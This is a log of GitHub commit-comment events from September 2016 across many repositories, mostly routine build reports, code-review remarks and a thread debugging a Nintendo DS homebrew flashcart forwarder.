{"id":"4531567692","type":"CommitCommentEvent","actor":{"login":"ebetica"},"repo":{"name":"facebook/fbthrift"},"payload":{"comment":{"id":18939122,"position":null,"line":null,"path":null,"commit_id":"aeaa4e685de99f4acfc5cc4288502476c74a697c","created_at":"2016-09-08T03:14:52Z","updated_at":"2016-09-08T03:14:52Z","body":"@seanfarley I'm not able to build Thrift anymore on GCC 6.1.1 because of\r\n\r\n-AC_CHECK_FUNCS([clock_gettime])\r\n\r\nWas this necessary for your macOS build? "}},"created_at":"2016-09-08T03:14:52Z"}
{"id":"4531573726","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939128,"position":null,"line":null,"path":null,"commit_id":"5fa54d988257c5dd927961dbb8ab172204d189fe","created_at":"2016-09-08T03:17:07Z","updated_at":"2016-09-08T03:17:07Z","body":"Also, ahezard fixed the built in card reset code in his fork of libnds. You can try switching to that. NitroHax has that change in the latest commit. I haven't gotten around to updating NTR Launcher to use it though. His mode switch function in libnds still hangs though. So don't use that just yet."}},"created_at":"2016-09-08T03:17:07Z"}
{"id":"4531579149","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939133,"position":null,"line":null,"path":null,"commit_id":"5fa54d988257c5dd927961dbb8ab172204d189fe","created_at":"2016-09-08T03:19:14Z","updated_at":"2016-09-08T03:19:14Z","body":"Did you remember to add libfat back to your project? A recent commit I added removed it since NTR Launcher doesn't use it. But yours does and it looks like you forgot to add it back."}},"created_at":"2016-09-08T03:19:14Z"}
{"id":"4531580308","type":"CommitCommentEvent","actor":{"login":"aconanlai"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":18939137,"position":null,"line":null,"path":null,"commit_id":"559f4e3c5d6e7e46b1d78758ddb2987ffc565309","created_at":"2016-09-08T03:19:40Z","updated_at":"2016-09-08T03:19:40Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;DmsEXHfv&#x2F;8-ft-007-show-current-playing-stream-name\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [FT-007] Show current playing stream name</a>"}},"created_at":"2016-09-08T03:19:40Z"}
{"id":"4531580707","type":"CommitCommentEvent","actor":{"login":"wendy-dliflc"},"repo":{"name":"danb-dliflc/DliActivities"},"payload":{"comment":{"id":18939138,"position":null,"line":null,"path":null,"commit_id":"3d931d4f735ea7f669ccc41424c41baa39f8e781","created_at":"2016-09-08T03:19:51Z","updated_at":"2016-09-08T03:19:51Z","body":"Update so that scroll bars are consistent with other templates."}},"created_at":"2016-09-08T03:19:51Z"}
{"id":"4531583192","type":"CommitCommentEvent","actor":{"login":"moeamaya"},"repo":{"name":"dixonandmoe/rellax"},"payload":{"comment":{"id":18939140,"position":null,"line":null,"path":null,"commit_id":"c6004a5e1a60f71c2c6adce25a1d5351ac6293fb","created_at":"2016-09-08T03:20:49Z","updated_at":"2016-09-08T03:20:49Z","body":"Yea you did"}},"created_at":"2016-09-08T03:20:49Z"}
{"id":"4531585244","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939144,"position":null,"line":null,"path":null,"commit_id":"5fa54d988257c5dd927961dbb8ab172204d189fe","created_at":"2016-09-08T03:21:38Z","updated_at":"2016-09-08T03:21:38Z","body":"I added -lfat to the ARM9 LIBS and fatInitDefault() doesn't crash... did I miss something else?"}},"created_at":"2016-09-08T03:21:38Z"}
{"id":"4531586864","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939146,"position":null,"line":null,"path":null,"commit_id":"5fa54d988257c5dd927961dbb8ab172204d189fe","created_at":"2016-09-08T03:22:18Z","updated_at":"2016-09-08T03:22:18Z","body":"#include <fat.h>\r\n\r\nThat seems to be missing from your main.cpp I think. I'm surprised it didn't error with it gone if you use stuff that needs it."}},"created_at":"2016-09-08T03:22:18Z"}
{"id":"4531588362","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939149,"position":null,"line":null,"path":null,"commit_id":"5fa54d988257c5dd927961dbb8ab172204d189fe","created_at":"2016-09-08T03:22:54Z","updated_at":"2016-09-08T03:22:54Z","body":"I have #include <fat.h> in the header for my flashcart code"}},"created_at":"2016-09-08T03:22:54Z"}
{"id":"4531589588","type":"CommitCommentEvent","actor":{"login":"clime"},"repo":{"name":"fedora-copr/copr"},"payload":{"comment":{"id":18939150,"position":null,"line":null,"path":null,"commit_id":"6408085570a93e4255ac185317ff6cd3706bce88","created_at":"2016-09-08T03:23:20Z","updated_at":"2016-09-08T03:23:20Z","body":"This is incorrectly tagged. Should have been [backend]!"}},"created_at":"2016-09-08T03:23:20Z"}
{"id":"4531589615","type":"CommitCommentEvent","actor":{"login":"quynhn"},"repo":{"name":"linagora/james-project"},"payload":{"comment":{"id":18939151,"position":46,"line":46,"path":"mailbox/store/src/main/java/org/apache/james/mailbox/store/event/MailboxAnnotationListener.java","commit_id":"99e2d57fdc575a03e65760fc29751b3829511092","created_at":"2016-09-08T03:23:20Z","updated_at":"2016-09-08T03:23:20Z","body":"it mean current listener should be run in asynchronous."}},"created_at":"2016-09-08T03:23:20Z"}
{"id":"4531590304","type":"CommitCommentEvent","actor":{"login":"Mtrshimao"},"repo":{"name":"Mtrshimao/2005"},"payload":{"comment":{"id":18939154,"position":null,"line":null,"path":null,"commit_id":"48e99da3bdd8ae5b63597ca6802e7ba4cba1861b","created_at":"2016-09-08T03:23:35Z","updated_at":"2016-09-08T03:23:35Z","body":"趋势图"}},"created_at":"2016-09-08T03:23:35Z"}
{"id":"4531590484","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939155,"position":null,"line":null,"path":null,"commit_id":"5fa54d988257c5dd927961dbb8ab172204d189fe","created_at":"2016-09-08T03:23:39Z","updated_at":"2016-09-08T03:23:39Z","body":"you may need to add include fat.h to NTR Launcher as well. That's the main thing I think may be causing the issue for you unless your DLDI stuff isn't occurring in NTR Launcher...."}},"created_at":"2016-09-08T03:23:39Z"}
{"id":"4531592873","type":"CommitCommentEvent","actor":{"login":"davedash"},"repo":{"name":"davedash/django-fixture-magic"},"payload":{"comment":{"id":18939163,"position":null,"line":null,"path":null,"commit_id":"414edd244fae0caa1f46d1e1eabfbb55361c78d0","created_at":"2016-09-08T03:24:31Z","updated_at":"2016-09-08T03:24:31Z","body":"I need to get Travis to do this for me.\nOn Wed, Sep 7, 2016 at 8:14 PM TheKGF <notifications@github.com> wrote:\n\n> Hey Dave, I don't suppose I could get you to release this? Hope all's\n> well. :)\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/davedash/django-fixture-magic/commit/414edd244fae0caa1f46d1e1eabfbb55361c78d0#commitcomment-18939119>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AADoaSqXZivW_eAYefe3hz4VejYus8Esks5qn32kgaJpZM4J3kaC>\n> .\n>\n"}},"created_at":"2016-09-08T03:24:31Z"}
{"id":"4531597297","type":"CommitCommentEvent","actor":{"login":"ekiwi"},"repo":{"name":"salkinium/xpcc"},"payload":{"comment":{"id":18939169,"position":68,"line":68,"path":"src/xpcc/architecture/interface/assert.hpp","commit_id":"2fd56738037694722281a5dca0d0480ae16c1549","created_at":"2016-09-08T03:26:10Z","updated_at":"2016-09-08T03:26:10Z","body":"Why is the identifier a string constant and not an enum value?"}},"created_at":"2016-09-08T03:26:10Z"}
{"id":"4531598519","type":"CommitCommentEvent","actor":{"login":"lylydinh"},"repo":{"name":"hilios/jQuery.countdown"},"payload":{"comment":{"id":18939170,"position":1,"line":1,"path":"test/qunit.config.js","commit_id":"7688495c81d8787a8ac13ff1936403f3d6ca280c","created_at":"2016-09-08T03:26:36Z","updated_at":"2016-09-08T03:26:36Z","body":"iuyiyui"}},"created_at":"2016-09-08T03:26:36Z"}
{"id":"4531602188","type":"CommitCommentEvent","actor":{"login":"freshtonic"},"repo":{"name":"graphql-elixir/graphql"},"payload":{"comment":{"id":18939173,"position":4,"line":47,"path":"lib/graphql/validation/rules/fields_on_correct_type.ex","commit_id":"21736924177773d0a662efecb28e2096475c3ec9","created_at":"2016-09-08T03:28:08Z","updated_at":"2016-09-08T03:28:08Z","body":"No it's meant to be a pattern match."}},"created_at":"2016-09-08T03:28:08Z"}
{"id":"4531607603","type":"CommitCommentEvent","actor":{"login":"freshtonic"},"repo":{"name":"graphql-elixir/graphql"},"payload":{"comment":{"id":18939180,"position":null,"line":null,"path":null,"commit_id":"4a409f48f1b37a93fb388f02262a7138d45503ca","created_at":"2016-09-08T03:30:19Z","updated_at":"2016-09-08T03:30:19Z","body":"The TypeInfoVisitor is tested indirectly via the validator tests. Any branches that are not covered means that there is no validator that uses it yet. There will be eventually."}},"created_at":"2016-09-08T03:30:19Z"}
{"id":"4531607845","type":"CommitCommentEvent","actor":{"login":"Sharlikran"},"repo":{"name":"wrye-bash/wrye-bash"},"payload":{"comment":{"id":18939181,"position":8,"line":2092,"path":"Mopy/bash/game/oblivion/records.py","commit_id":"185b2a79ab5a4d5a1873e5c1bac0ad2335ba18e6","created_at":"2016-09-08T03:30:24Z","updated_at":"2016-09-08T03:30:24Z","body":"I don't know why I changed constants.py but did not change MreSoun in records.py.  That's weird.  In fact definitions can't have duplicate attributes.  So for SNDD you have unused1 and unused2, then unused1 in SNDX.  It should be unused3.  There could be code that's always been that way and nobody noticed.  When I find it I try to change it but I can't catch it all.  \r\n\r\nAlso at some point pyCharm or whatever needs to look for global attributes that are reserved.  Like in class MreRecord I think flags1 and flags2 are used.  So you can't use that in any definition anywhere. @valda told me once what was reserved and I don't remember if unused1 and unused2 are also reserved for the record header."}},"created_at":"2016-09-08T03:30:24Z"}
{"id":"4531609638","type":"CommitCommentEvent","actor":{"login":"Jvan1993"},"repo":{"name":"Jvan1993/hello-world"},"payload":{"comment":{"id":18939184,"position":4,"line":2,"path":"README.md","commit_id":"3927d3e966ac2ebe1269a904e888b01f64cc043c","created_at":"2016-09-08T03:31:06Z","updated_at":"2016-09-08T03:31:06Z","body":"just another one."}},"created_at":"2016-09-08T03:31:06Z"}
{"id":"4531613924","type":"CommitCommentEvent","actor":{"login":"guoyunyun"},"repo":{"name":"guoyunyun/ScrollView"},"payload":{"comment":{"id":18939193,"position":7,"line":5,"path":"README.md","commit_id":"035e0bb12bfc04490db91b7cdf68541f4a3931ae","created_at":"2016-09-08T03:32:56Z","updated_at":"2016-09-08T03:32:56Z","body":"![simulator screen shot 2016 9 8 11 24 59](https://cloud.githubusercontent.com/assets/13198185/18336212/f347567c-75b7-11e6-9731-c4dc57f119df.png)\r\n"}},"created_at":"2016-09-08T03:32:56Z"}
{"id":"4531615998","type":"CommitCommentEvent","actor":{"login":"Jvan1993"},"repo":{"name":"Jvan1993/hello-world"},"payload":{"comment":{"id":18939197,"position":null,"line":null,"path":null,"commit_id":"3927d3e966ac2ebe1269a904e888b01f64cc043c","created_at":"2016-09-08T03:33:47Z","updated_at":"2016-09-08T03:33:47Z","body":"humans"}},"created_at":"2016-09-08T03:33:47Z"}
{"id":"4531617818","type":"CommitCommentEvent","actor":{"login":"presidentbeef"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18939201,"position":null,"line":null,"path":null,"commit_id":"d4cbfd2d8cdb507263b587d65aa9712e11f56035","created_at":"2016-09-08T03:34:23Z","updated_at":"2016-09-08T03:34:23Z","body":"@headius I don't think this fix works on Windows:\r\n\r\n```\r\n$ java -jar BrakemanPro.jar\r\nLoadError: no such file to load -- classpath:c:/vendor/bundle/bundler/setup\r\n           require at org/jruby/RubyKernel.java:955\r\n  require_relative at uri:classloader:/jruby/kernel/kernel.rb:13\r\n            <main> at classpath:/jar-bootstrap.rb:2\r\n```"}},"created_at":"2016-09-08T03:34:23Z"}
{"id":"4531618776","type":"CommitCommentEvent","actor":{"login":"NightFeather"},"repo":{"name":"NightFeather/pcmanx"},"payload":{"comment":{"id":18939203,"position":null,"line":null,"path":null,"commit_id":"a24a3007c269ad9a347c8a0c8c301506ef1c801d","created_at":"2016-09-08T03:34:44Z","updated_at":"2016-09-08T03:34:44Z","body":"Should link to issue #82"}},"created_at":"2016-09-08T03:34:44Z"}
{"id":"4531620487","type":"CommitCommentEvent","actor":{"login":"NightFeather"},"repo":{"name":"NightFeather/pcmanx"},"payload":{"comment":{"id":18939207,"position":null,"line":null,"path":null,"commit_id":"a24a3007c269ad9a347c8a0c8c301506ef1c801d","created_at":"2016-09-08T03:35:18Z","updated_at":"2016-09-08T03:35:18Z","body":"下次 push 之前要記得先檢查 orz\r\n"}},"created_at":"2016-09-08T03:35:18Z"}
{"id":"4531626892","type":"CommitCommentEvent","actor":{"login":"alertEcho"},"repo":{"name":"alertEcho/tests"},"payload":{"comment":{"id":18939214,"position":null,"line":null,"path":null,"commit_id":"0031f2e9f8fe729bfa4e7ce54f1d61f53c22d5c3","created_at":"2016-09-08T03:37:33Z","updated_at":"2016-09-08T03:37:33Z","body":"# 好吧## "}},"created_at":"2016-09-08T03:37:33Z"}
{"id":"4531628054","type":"CommitCommentEvent","actor":{"login":"alertEcho"},"repo":{"name":"alertEcho/tests"},"payload":{"comment":{"id":18939217,"position":null,"line":null,"path":null,"commit_id":"0031f2e9f8fe729bfa4e7ce54f1d61f53c22d5c3","created_at":"2016-09-08T03:37:59Z","updated_at":"2016-09-08T03:37:59Z","body":"对对对"}},"created_at":"2016-09-08T03:37:59Z"}
{"id":"4531630620","type":"CommitCommentEvent","actor":{"login":"qwIvan"},"repo":{"name":"ZoomerAnalytics/xlwings"},"payload":{"comment":{"id":18939219,"position":4,"line":15,"path":"setup.py","commit_id":"8b17b68413cbded399601b7db30e23ef59d9a4c1","created_at":"2016-09-08T03:38:50Z","updated_at":"2016-09-08T03:38:50Z","body":"I mean that why did you stop wine supporting. I was try to use it with wine in Linux."}},"created_at":"2016-09-08T03:38:50Z"}
{"id":"4531633156","type":"CommitCommentEvent","actor":{"login":"alertEcho"},"repo":{"name":"alertEcho/tests"},"payload":{"comment":{"id":18939224,"position":null,"line":null,"path":null,"commit_id":"0031f2e9f8fe729bfa4e7ce54f1d61f53c22d5c3","created_at":"2016-09-08T03:39:52Z","updated_at":"2016-09-08T03:39:52Z","body":"**的地方**"}},"created_at":"2016-09-08T03:39:52Z"}
{"id":"4531640022","type":"CommitCommentEvent","actor":{"login":"alertEcho"},"repo":{"name":"alertEcho/tests"},"payload":{"comment":{"id":18939238,"position":1,"line":1,"path":"index.php","commit_id":"5db57691d9c2d00dd53061ba036b037cbf950537","created_at":"2016-09-08T03:42:27Z","updated_at":"2016-09-08T03:42:27Z","body":"ok"}},"created_at":"2016-09-08T03:42:27Z"}
{"id":"4531640574","type":"CommitCommentEvent","actor":{"login":"alertEcho"},"repo":{"name":"alertEcho/tests"},"payload":{"comment":{"id":18939240,"position":1,"line":1,"path":"index.php","commit_id":"5db57691d9c2d00dd53061ba036b037cbf950537","created_at":"2016-09-08T03:42:40Z","updated_at":"2016-09-08T03:42:40Z","body":"dd "}},"created_at":"2016-09-08T03:42:40Z"}
{"id":"4531647518","type":"CommitCommentEvent","actor":{"login":"rmaratos"},"repo":{"name":"ABTech/abtech.org"},"payload":{"comment":{"id":18939252,"position":null,"line":null,"path":null,"commit_id":"0d1c8b7f38bf6cad672ed7ce8306e990d803988e","created_at":"2016-09-08T03:45:27Z","updated_at":"2016-09-08T03:45:27Z","body":"Closes #53 "}},"created_at":"2016-09-08T03:45:27Z"}
{"id":"4531648229","type":"CommitCommentEvent","actor":{"login":"alertEcho"},"repo":{"name":"alertEcho/tests"},"payload":{"comment":{"id":18939253,"position":1,"line":1,"path":"readme.txt","commit_id":"dc578dab6d82d3f3c8aedc1a1c5f868f41813784","created_at":"2016-09-08T03:45:44Z","updated_at":"2016-09-08T03:45:44Z","body":"luanma"}},"created_at":"2016-09-08T03:45:44Z"}
{"id":"4531649041","type":"CommitCommentEvent","actor":{"login":"alertEcho"},"repo":{"name":"alertEcho/tests"},"payload":{"comment":{"id":18939255,"position":null,"line":null,"path":null,"commit_id":"dc578dab6d82d3f3c8aedc1a1c5f868f41813784","created_at":"2016-09-08T03:46:04Z","updated_at":"2016-09-08T03:46:04Z","body":"ddd"}},"created_at":"2016-09-08T03:46:04Z"}
{"id":"4531649837","type":"CommitCommentEvent","actor":{"login":"alertEcho"},"repo":{"name":"alertEcho/tests"},"payload":{"comment":{"id":18939256,"position":null,"line":null,"path":null,"commit_id":"dc578dab6d82d3f3c8aedc1a1c5f868f41813784","created_at":"2016-09-08T03:46:24Z","updated_at":"2016-09-08T03:46:24Z","body":"有点乱码"}},"created_at":"2016-09-08T03:46:24Z"}
{"id":"4531652062","type":"CommitCommentEvent","actor":{"login":"thgaskell"},"repo":{"name":"creindle/redux-demo"},"payload":{"comment":{"id":18939261,"position":4,"line":4,"path":"src/component/TaskList.js","commit_id":"4ddeceb13e7a9c030fc3c42c7eaf12995351f63c","created_at":"2016-09-08T03:47:16Z","updated_at":"2016-09-08T03:47:16Z","body":"This should be `React.Component`."}},"created_at":"2016-09-08T03:47:16Z"}
{"id":"4531652616","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939263,"position":null,"line":null,"path":null,"commit_id":"5fa54d988257c5dd927961dbb8ab172204d189fe","created_at":"2016-09-08T03:47:29Z","updated_at":"2016-09-08T03:47:29Z","body":"So... it was definitely the slot powering off before being able to DLDI init...\r\n\r\nIf I move my code to the top of ARM9 main() it's able to modify the files on the Slot-1 SD card...\r\n\r\nBut then it fails to boot unless twlBg is patched..."}},"created_at":"2016-09-08T03:47:29Z"}
{"id":"4531654871","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939268,"position":null,"line":null,"path":null,"commit_id":"5fa54d988257c5dd927961dbb8ab172204d189fe","created_at":"2016-09-08T03:48:26Z","updated_at":"2016-09-08T03:48:26Z","body":"Why would it need patched twlBg? NTR Launcher should be run in TWL mode. It mode switches back to NTR mode which works without dev launcher patch."}},"created_at":"2016-09-08T03:48:26Z"}
{"id":"4531655574","type":"CommitCommentEvent","actor":{"login":"robot-rover"},"repo":{"name":"robot-rover/SovietBot"},"payload":{"comment":{"id":18939270,"position":null,"line":null,"path":null,"commit_id":"4969960daed48fbc403ab76c5f12f85385c0c3a3","created_at":"2016-09-08T03:48:43Z","updated_at":"2016-09-08T03:48:43Z","body":"Also adds the foundation for the perms structure "}},"created_at":"2016-09-08T03:48:43Z"}
{"id":"4531658459","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939275,"position":null,"line":null,"path":null,"commit_id":"5fa54d988257c5dd927961dbb8ab172204d189fe","created_at":"2016-09-08T03:49:57Z","updated_at":"2016-09-08T03:49:57Z","body":"Yeah... I'm stumped too... If I don't DLDI init it will boot the card fine without the twlBg patch..."}},"created_at":"2016-09-08T03:49:57Z"}
{"id":"4531660300","type":"CommitCommentEvent","actor":{"login":"tdang2"},"repo":{"name":"tdang2/tdpharma"},"payload":{"comment":{"id":18939279,"position":null,"line":null,"path":null,"commit_id":"a08e58f0a98b044eb46ab9a027c947738c354296","created_at":"2016-09-08T03:50:41Z","updated_at":"2016-09-08T03:50:41Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;k0DKDXBs&#x2F;60-server-authentication\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Server authentication</a>"}},"created_at":"2016-09-08T03:50:41Z"}
{"id":"4531660437","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939280,"position":null,"line":null,"path":null,"commit_id":"5fa54d988257c5dd927961dbb8ab172204d189fe","created_at":"2016-09-08T03:50:44Z","updated_at":"2016-09-08T03:50:44Z","body":"Hmm what's running on the card because I'm not seeing any DLDI stuff in NTR Forwarder...(at least this branch you made this commit in)\r\n\r\nIf I could see what the code was maybe I could spot something..."}},"created_at":"2016-09-08T03:50:44Z"}
{"id":"4531663072","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939286,"position":null,"line":null,"path":null,"commit_id":"5fa54d988257c5dd927961dbb8ab172204d189fe","created_at":"2016-09-08T03:51:49Z","updated_at":"2016-09-08T03:51:49Z","body":"Wait nevermind I was looking at the wrong branch I guess. :P"}},"created_at":"2016-09-08T03:51:49Z"}
{"id":"4531663220","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939287,"position":null,"line":null,"path":null,"commit_id":"5fa54d988257c5dd927961dbb8ab172204d189fe","created_at":"2016-09-08T03:51:53Z","updated_at":"2016-09-08T03:51:53Z","body":"pretty much all of my code is in arm9/source/flashcard-forwarder.cpp (including fatInitDefault)\r\n\r\nI've just been moving that function around the arm9 main for the different results"}},"created_at":"2016-09-08T03:51:53Z"}
{"id":"4531664719","type":"CommitCommentEvent","actor":{"login":"RBowind"},"repo":{"name":"RBowind/Running"},"payload":{"comment":{"id":18939290,"position":5,"line":23,"path":"search.php","commit_id":"0062170631dec3fd29ffeb7f9d35cc3da4b6755c","created_at":"2016-09-08T03:52:32Z","updated_at":"2016-09-08T03:52:32Z","body":"yes!"}},"created_at":"2016-09-08T03:52:32Z"}
{"id":"4531664774","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939291,"position":null,"line":null,"path":null,"commit_id":"5fa54d988257c5dd927961dbb8ab172204d189fe","created_at":"2016-09-08T03:52:34Z","updated_at":"2016-09-08T03:52:34Z","body":"it's on the update-patch branch btw"}},"created_at":"2016-09-08T03:52:34Z"}
{"id":"4531665547","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18939295,"position":null,"line":null,"path":null,"commit_id":"1e6e905e1316184b763fe3b9532074373dd6194a","created_at":"2016-09-08T03:52:53Z","updated_at":"2016-09-08T03:52:53Z","body":"> シングルではなくダブルクオートで囲まないと中の変数は有効にならないのですね。\r\n\r\nその通りです！\r\nあとはシングルクォートの中でシングルクォートを使うのもエラーになりますね。\r\n\r\n> 同様にしたらDELETEもできたので、リポジトリにプッシュしました。\r\n\r\nおお、さすがです！早いですね。了解しました！"}},"created_at":"2016-09-08T03:52:53Z"}
{"id":"4531667683","type":"CommitCommentEvent","actor":{"login":"nicotron"},"repo":{"name":"nicotron/ed222016"},"payload":{"comment":{"id":18939297,"position":null,"line":null,"path":null,"commit_id":"a923b52c30287a7fc7cd36ecb413628093c515f9","created_at":"2016-09-08T03:53:46Z","updated_at":"2016-09-08T03:53:46Z","body":"Revivir archivos borrados por Catalina Juez"}},"created_at":"2016-09-08T03:53:46Z"}
{"id":"4531669087","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"trevorcai/react-starter"},"payload":{"comment":{"id":18939299,"position":1,"line":1,"path":"ui/actions.js","commit_id":"79659c493b754b30b40260f845a17a13e833319c","created_at":"2016-09-08T03:54:18Z","updated_at":"2016-09-08T03:54:18Z","body":"Generally types are defined in a separate file and then imported into actions."}},"created_at":"2016-09-08T03:54:18Z"}
{"id":"4531669850","type":"CommitCommentEvent","actor":{"login":"rorromr"},"repo":{"name":"rorromr/ei4001"},"payload":{"comment":{"id":18939300,"position":null,"line":null,"path":null,"commit_id":"46b66738a74f837c2d2f6728fe584ff3fb267728","created_at":"2016-09-08T03:54:37Z","updated_at":"2016-09-08T03:54:37Z","body":"OK debe ser un tema de permisos, lo moveré y daré permisos"}},"created_at":"2016-09-08T03:54:37Z"}
{"id":"4531670700","type":"CommitCommentEvent","actor":{"login":"SoyokazeKuga"},"repo":{"name":"SoyokazeKuga/StartTest01"},"payload":{"comment":{"id":18939302,"position":null,"line":null,"path":null,"commit_id":"d4f251477597d2b88a07d433e7b94a40f75f1cd6","created_at":"2016-09-08T03:54:57Z","updated_at":"2016-09-08T03:54:57Z","body":"is this read me?"}},"created_at":"2016-09-08T03:54:57Z"}
{"id":"4531671514","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18939305,"position":null,"line":null,"path":null,"commit_id":"7f9d76bfe1c8d18a09e9e3001171e08fb08d3dc8","created_at":"2016-09-08T03:55:17Z","updated_at":"2016-09-08T03:55:17Z","body":"os_2_0_develop (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7f9d76bfe1c8d18a09e9e3001171e08fb08d3dc8-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7f9d76bfe1c8d18a09e9e3001171e08fb08d3dc8-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-08T03:55:17Z"}
{"id":"4531671880","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"trevorcai/react-starter"},"payload":{"comment":{"id":18939307,"position":17,"line":17,"path":"ui/search.jsx","commit_id":"79659c493b754b30b40260f845a17a13e833319c","created_at":"2016-09-08T03:55:26Z","updated_at":"2016-09-08T03:55:26Z","body":"There's a `<button>` tag that will provide a better UI element than a `<div>` tag."}},"created_at":"2016-09-08T03:55:26Z"}
{"id":"4531672300","type":"CommitCommentEvent","actor":{"login":"SoyokazeKuga"},"repo":{"name":"SoyokazeKuga/StartTest01"},"payload":{"comment":{"id":18939308,"position":null,"line":null,"path":null,"commit_id":"d4f251477597d2b88a07d433e7b94a40f75f1cd6","created_at":"2016-09-08T03:55:37Z","updated_at":"2016-09-08T03:55:37Z","body":"coment"}},"created_at":"2016-09-08T03:55:37Z"}
{"id":"4531672922","type":"CommitCommentEvent","actor":{"login":"SoyokazeKuga"},"repo":{"name":"SoyokazeKuga/StartTest01"},"payload":{"comment":{"id":18939310,"position":null,"line":null,"path":null,"commit_id":"d4f251477597d2b88a07d433e7b94a40f75f1cd6","created_at":"2016-09-08T03:55:52Z","updated_at":"2016-09-08T03:55:52Z","body":"wtf"}},"created_at":"2016-09-08T03:55:52Z"}
{"id":"4531673584","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18939311,"position":null,"line":null,"path":null,"commit_id":"fd679b95d07cc68aa68b57b3de1ff0f40f24977c","created_at":"2016-09-08T03:56:07Z","updated_at":"2016-09-08T03:56:07Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-08T03:56:07Z"}
{"id":"4531676087","type":"CommitCommentEvent","actor":{"login":"gautamarora"},"repo":{"name":"gautamarora/todos"},"payload":{"comment":{"id":18939313,"position":94,"line":157,"path":"client/script.js","commit_id":"10fd40e50d6b6cad672b7a12891c5e7d38765e1d","created_at":"2016-09-08T03:57:10Z","updated_at":"2016-09-08T03:57:10Z","body":"❗ this need of ref for every span could be avoided by passing text as a prop, and using that in the onKeyDown event handler"}},"created_at":"2016-09-08T03:57:10Z"}
{"id":"4531676095","type":"CommitCommentEvent","actor":{"login":"Kovee98"},"repo":{"name":"Kovee98/Lab3"},"payload":{"comment":{"id":18939314,"position":null,"line":null,"path":null,"commit_id":"e84dd4b057148a86420d718861bef747ab33c4e3","created_at":"2016-09-08T03:57:11Z","updated_at":"2016-09-08T03:57:11Z","body":"haha nice man, ill have it done by tomorrow night i promise\r\n"}},"created_at":"2016-09-08T03:57:11Z"}
{"id":"4531676400","type":"CommitCommentEvent","actor":{"login":"Kovee98"},"repo":{"name":"Kovee98/Lab3"},"payload":{"comment":{"id":18939316,"position":null,"line":null,"path":null,"commit_id":"e84dd4b057148a86420d718861bef747ab33c4e3","created_at":"2016-09-08T03:57:19Z","updated_at":"2016-09-08T03:57:19Z","body":"the rest of the .cpp"}},"created_at":"2016-09-08T03:57:19Z"}
{"id":"4531677283","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18939318,"position":null,"line":null,"path":null,"commit_id":"5fa54d988257c5dd927961dbb8ab172204d189fe","created_at":"2016-09-08T03:57:40Z","updated_at":"2016-09-08T03:57:40Z","body":"The error that happens if I don't have twlBg patched and fatInit is the \"Software Closed\" 3DS screen\r\n\r\nOtherwise the slot boots normally without twlBg"}},"created_at":"2016-09-08T03:57:40Z"}
